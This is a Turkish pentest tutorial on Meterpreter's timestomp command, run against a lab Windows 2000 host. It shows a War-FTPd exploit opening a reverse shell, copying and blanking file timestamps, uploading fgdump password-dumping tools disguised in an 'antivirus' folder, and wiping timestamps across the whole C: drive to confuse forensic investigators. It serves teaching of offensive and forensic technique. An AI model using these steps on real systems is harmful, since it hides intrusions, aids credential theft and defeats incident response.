MSF Timestomp

Estimated read time 9 min read

TimeStomp Nedir?

Herhangi bir sistemde pentest yapmak, o sistemle etkileşime girmeyi gerektirir. Gerçekleştirdiğiniz her işlemde, hedef sistemde izler bırakırsınız. Bu bıraktığınız izleri incelemek forensics araştırmacılarının dikkatini çeker. Dosyaların zaman damgaları bunlardan bir tanesidir. Bırakılan bu izleri temizlemek veya en azından karıştırmak için Meterpreter timestomp adı verilen bir komut sağlamaktadır.

İz bırakmamanın en iyi yolu sisteme hiç dokunmamaktır. Meterpreter, normal olarak RAM üzerinde çalışır ve diske dokunmaz. Fakat gerçekleştireceğiniz bir takım dosya işlemleri sonucunda ister istemez zaman logları oluşacaktır. Bu yazımızda dosyaların zaman kayıtları üzerinde timestomp komutu kullanılarak oynama yapmayı göreceğiz.

Her dosyanın Windows için Modified, Accesed ve Changed olarak 3 farklı zaman kaydı tutulur. Bunlara baş harflerinden hareetle kısaca MAC zamanları diyebiliriz. Ağ kartının MAC adresi ile karıştırmayın.

Windows içerisinde bir dosyanın MAC zamanlarına bakalım.

File Path: C:\Documents and Settings\P0WN3D\My Documents\test.txt
Created Date: 5/3/2009 2:30:08 AM
Last Accessed: 5/3/2009 2:31:39 AM
Last Modified: 5/3/2009 2:30:36 AM

Yukarıda, test.txt isimli dosyanın zaman kayıtlarını görebiliriz. Şimdi, warftpd_165_user modülünü kullanarak bu sistemde Meterpreter oturum açtığımızı farz edelim.

msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] meterpreter session 1 opened (172.16.104.130:4444 -> 172.16.104.145:1218)
meterpreter > use priv
Loading extension priv...success.

Meterpreter shell açıldıktan sonra timestomp -h komutu ile yardım bilgilerini görüntüleyebilirsiniz.

meterpreter > timestomp -h

Usage: timestomp OPTIONS file_path

OPTIONS:

  -a  Set the "last accessed" time of the file
  -b    Set the MACE timestamps so that EnCase shows blanks
  -c  Set the "creation" time of the file
  -e  Set the "mft entry modified" time of the file
  -f  Set the MACE of attributes equal to the supplied file
  -h    Help banner
  -m  Set the "last written" time of the file
  -r    Set the MACE timestamps recursively on a directory
  -v    Display the UTC MACE values of the file
  -z  Set all four attributes (MACE) of the file

Şimdi, yukarıda örneğini verdiğimiz test.txt dosyasının bulunduğu klasöre gidelim.

meterpreter > pwd
C:\Program Files\War-ftpd
meterpreter > cd ..
meterpreter > pwd
C:Program Files
meterpreter > cd ..
meterpreter > cd Documents\ and\ Settings
meterpreter > cd P0WN3D
meterpreter > cd My\ Documents
meterpreter > ls

Listing: C:\Documents and Settings\P0WN3D\My Documents
======================================================

Mode       Size Type Last modified          Name    
----       ---- ---- -------------          ----    
40777/rwxrwxrwx  0   dir  Wed Dec 31 19:00:00 -0500 1969 .      
40777/rwxrwxrwx  0   dir  Wed Dec 31 19:00:00 -0500 1969 ..     
40555/r-xr-xr-x  0   dir  Wed Dec 31 19:00:00 -0500 1969 My Pictures 
100666/rw-rw-rw- 28  fil  Wed Dec 31 19:00:00 -0500 1969 test.txt

Bulunduğumuz klasördeki test.txt dosyasının zaman bilgilerini -v seçeneği ile görüntüleyebilirsiniz.

meterpreter > timestomp test.txt -v
Modified   : Sun May 03 04:30:36 -0400 2009
Accessed   : Sun May 03 04:31:51 -0400 2009
Created    : Sun May 03 04:30:08 -0400 2009
Entry Modified: Sun May 03 04:31:44 -0400 2009

Bu dosyayı sizin oluşturduğunuzu düşünün. Bunu değiştirmek isteyebilirsiniz. Şimdi bu zaman bilgilerini değiştirmeye çalışalım. Bunu yapmanın birinci yolu, sistemde bulunan başka bir dosyanın zaman bilgilerini, test.txt dosyasına kopyalakmatır.

Örneğin, cmd.exe dosyasının zaman bilgilerini test.txt zaman bilgilerine kopyalayalım. Bunun için aşağıdaki komutu -f seçeneği ile yürütebilirsiniz.

meterpreter > timestomp test.txt -f C:\\WINNT\\system32\\cmd.exe
[*] Setting MACE attributes on test.txt from C:\WINNT\system32\cmd.exe
meterpreter > timestomp test.txt -v
Modified   : Tue Dec 07 08:00:00 -0500 1999
Accessed   : Sun May 03 05:14:51 -0400 2009
Created    : Tue Dec 07 08:00:00 -0500 1999
Entry Modified: Sun May 03 05:11:16 -0400 2009

İşlem tamamlandı. Gerçekten kopyalanmış mı bakalım.

File Path: C:\Documents and Settings\P0WN3D\My Documents\test.txt
Created Date: 12/7/1999 7:00:00 AM
Last Accessed: 5/3/2009 3:11:16 AM
Last Modified: 12/7/1999 7:00:00 AM

Gördüğünüz gibi test.txt dosyasının MAC zaman bilgileri cmd.exe dosyasıyla aynı oldu.

Dikkatli bir kullanıcıysanız, Windows komut satırından ve Linux komut satırından dosyaya baktığınızda tarih bilgileri aynı olsa da saat bilgilerinin farklı olduğunu fark etmişsinizdir. Bu farkın sebebi timezone zaman dilimlerinin farklılığındandır.

Ayıca, test.txt dosyasının accessed time değerinin dosyanın bilgilerini kontrol ettiğimizden dolayı hemen yeni tarihe güncellendiğini de vurgulamak gerekir. Windows için zaman kayıtlarının ne kadar değişken ve önemli olduğunu vurgulamak yerinde olacaktır.

Şimdi farklı bir teknik kullanalım. timestomp sunduğu -b seçeneği, zaman bilgilerini boş olarak ayarlamanıza yardımcı olur. Aşağıdaki örnekte, dosyanın mevcut durumu ve timestomp test.txt -b komutu sonrasındaki zaman bilgilerini görebilirsiniz.

meterpreter > timestomp test.txt -v
Modified   : Tue Dec 07 08:00:00 -0500 1999
Accessed   : Sun May 03 05:16:20 -0400 2009
Created    : Tue Dec 07 08:00:00 -0500 1999
Entry Modified: Sun May 03 05:11:16 -0400 2009

meterpreter > timestomp test.txt -b
[*] Blanking file MACE attributes on test.txt
meterpreter > timestomp test.txt -v
Modified   : 2106-02-06 23:28:15 -0700
Accessed   : 2106-02-06 23:28:15 -0700
Created    : 2106-02-06 23:28:15 -0700
Entry Modified: 2106-02-06 23:28:15 -0700

Görüldüğü gibi dosyalar 2106 yılına ait zaman bilgilerini aldı. Bu görünüm Meterpreter komut satırından böyle iken bir de Windows içerisinde nasıl göründüğüne bakalım.

File Path: C:\Documents and Settings\P0WN3D\My Documents\test.txt
Created Date: 1/1/1601
Last Accessed: 5/3/2009 3:21:13 AM
Last Modified: 1/1/1601

Linux Meterpreter içerisinde 2106 yılı, Windows içinde 1601 oarak görülmektedir. Bu farkın sebebini Ek bilgi sayfasından inceleyebilirsiniz.

Başka Bir Örnek

Şimdi, meterpreter komut satırımızdan Windows içerisine WINNT\\antivirus\\ klasörü oluşturalım ve içerisine bir kaç dosya yükleyelim.

meterpreter > cd C:\\WINNT
meterpreter > mkdir antivirus
Creating directory: antivirus
meterpreter > cd antivirus
meterpreter > pwd
C:\WINNT\antivirus
meterpreter > upload /usr/share/windows-binaries/fgdump c:\\WINNT\\antivirus\\
[*] uploading : /usr/share/windows-binaries/fgdump/servpw.exe -> c:WINNTantivirusPwDump.exe
[*] uploaded  : /usr/share/windows-binaries/fgdump/servpw.exe -> c:WINNTantivirusPwDump.exe
[*] uploading : /usr/share/windows-binaries/fgdump/cachedump64.exe -> c:WINNTantivirusLsaExt.dll
[*] uploaded  : /usr/share/windows-binaries/fgdump/cachedump64.exe -> c:WINNTantivirusLsaExt.dll
[*] uploading : /usr/share/windows-binaries/fgdump/pstgdump.exe -> c:WINNTantiviruspwservice.exe
[*] uploaded  : /usr/share/windows-binaries/fgdump/pstgdump.exe -> c:WINNTantiviruspwservice.exe
meterpreter > ls

Listing: C:\WINNT\antivirus
===========================

Mode       Size  Type Last modified          Name     
----       ----  ---- -------------          ----     
100777/rwxrwxrwx 174080 fil  2017-05-09 15:23:19 -0600 cachedump64.exe
100777/rwxrwxrwx 57344  fil  2017-05-09 15:23:20 -0600 pstgdump.exe
100777/rwxrwxrwx 57344  fil  2017-05-09 15:23:18 -0600 servpw.exe
meterpreter > cd ..

Artık Windows içerisine antivirus klasörünün içerisine yüklediğimiz 3 adet exe dosyamız var. Bunların zaman bilgilerine bakalım.

meterpreter > timestomp antivirus\\servpw.exe -v
Modified   : 2017-05-09 16:23:18 -0600
Accessed   : 2017-05-09 16:23:18 -0600
Created    : 2017-05-09 16:23:18 -0600
Entry Modified: 2017-05-09 16:23:18 -0600
meterpreter > timestomp antivirus\\pstgdump.exe -v
Modified   : 2017-05-09 16:23:20 -0600
Accessed   : 2017-05-09 16:23:19 -0600
Created    : 2017-05-09 16:23:19 -0600
Entry Modified: 2017-05-09 16:23:20 -0600

timestomp komutunun -r seçeneğini kullanarak tüm klasör içeriğindeki dosyaların zaman bilgilerini boşaltabilirsiniz.

meterpreter > timestomp antivirus -r
[*] Blanking directory MACE attributes on antivirus

meterpreter > ls
40777/rwxrwxrwx  0   dir  1980-01-01 00:00:00 -0700 ..
100666/rw-rw-rw- 115  fil  2106-02-06 23:28:15 -0700 servpw.exe
100666/rw-rw-rw- 12165 fil  2106-02-06 23:28:15 -0700 pstgdump.exe

Yukarıda anlatılan yöntemlerle zaman bilgilerini değiştirdik veya boş hale getirdik ancak dikkatli forensics araştırmacıları bu garipliği fark edecektir.

Bunun yerine sistemin tamamının zaman bilgilerini değiştirmeyi düşünebilirsiniz. Bu durumda, hangi dosyanın ne zaman oluşturulduğu veya değiştirildiği tamamen karışacaktır. Karşılaştırma yapılacak başka bir dosya olmadığından işler iyice karmaşık hale gelecektir.

Bu durum, sisteme bir müdahale olduğunu açık olarak ortaya koymakla birlikte forensics araştırmacılarının işini zorlaştıracaktır.

Tüm Sistemin Zaman Bilgilerini Değiştirme

meterpreter > pwd
C:WINNT\antivirus
meterpreter > cd ../..
meterpreter > pwd
C:
meterpreter > ls

Listing: C:\
============

Mode       Size    Type Last modified          Name           
----       ----    ---- -------------          ----           
100777/rwxrwxrwx 0     fil  Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT       
100666/rw-rw-rw- 0     fil  Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS        
40777/rwxrwxrwx  0     dir  Wed Dec 31 19:00:00 -0500 1969 Documents and Settings  
100444/r--r--r-- 0     fil  Wed Dec 31 19:00:00 -0500 1969 IO.SYS          
100444/r--r--r-- 0     fil  Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS         
100555/r-xr-xr-x 34468   fil  Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM       
40555/r-xr-xr-x  0     dir  Wed Dec 31 19:00:00 -0500 1969 Program Files       
40777/rwxrwxrwx  0     dir  Wed Dec 31 19:00:00 -0500 1969 RECYCLER         
40777/rwxrwxrwx  0     dir  Wed Dec 31 19:00:00 -0500 1969 System Volume Information 
40777/rwxrwxrwx  0     dir  Wed Dec 31 19:00:00 -0500 1969 WINNT           
100555/r-xr-xr-x 148992   fil  Wed Dec 31 19:00:00 -0500 1969 arcldr.exe        
100555/r-xr-xr-x 162816   fil  Wed Dec 31 19:00:00 -0500 1969 arcsetup.exe       
100666/rw-rw-rw- 192    fil  Wed Dec 31 19:00:00 -0500 1969 boot.ini         
100444/r--r--r-- 214416   fil  Wed Dec 31 19:00:00 -0500 1969 ntldr           
100666/rw-rw-rw- 402653184 fil  Wed Dec 31 19:00:00 -0500 1969 pagefile.sys       

meterpreter > timestomp C:\\ -r
[*] Blanking directory MACE attributes on C:\
meterpreter > ls
meterpreter > ls

Listing: C:\
============

Mode       Size    Type Last modified       Name
----       ----    ---- -------------       ----
100777/rwxrwxrwx 0     fil  2106-02-06 23:28:15 -0700 AUTOEXEC.BAT
100666/rw-rw-rw- 0     fil  2106-02-06 23:28:15 -0700 CONFIG.SYS
100666/rw-rw-rw- 0     fil  2106-02-06 23:28:15 -0700 Documents and Settings
100444/r--r--r-- 0     fil  2106-02-06 23:28:15 -0700 IO.SYS
100444/r--r--r-- 0     fil  2106-02-06 23:28:15 -0700 MSDOS.SYS
100555/r-xr-xr-x 47564   fil  2106-02-06 23:28:15 -0700 NTDETECT.COM
...snip...

timestomp C:\\ -r komutuyla C diskinde bulunan tüm dosyaların zaman bilgilerinin değiştirildiğini görebilirsiniz.

Akıllı forensics araştırmacıları, sadece zaman bilgileri değil başka yerlere de bakarlar. Windows içinde çeşitli farklı kayıt mekanizmaları bulunmaktadır.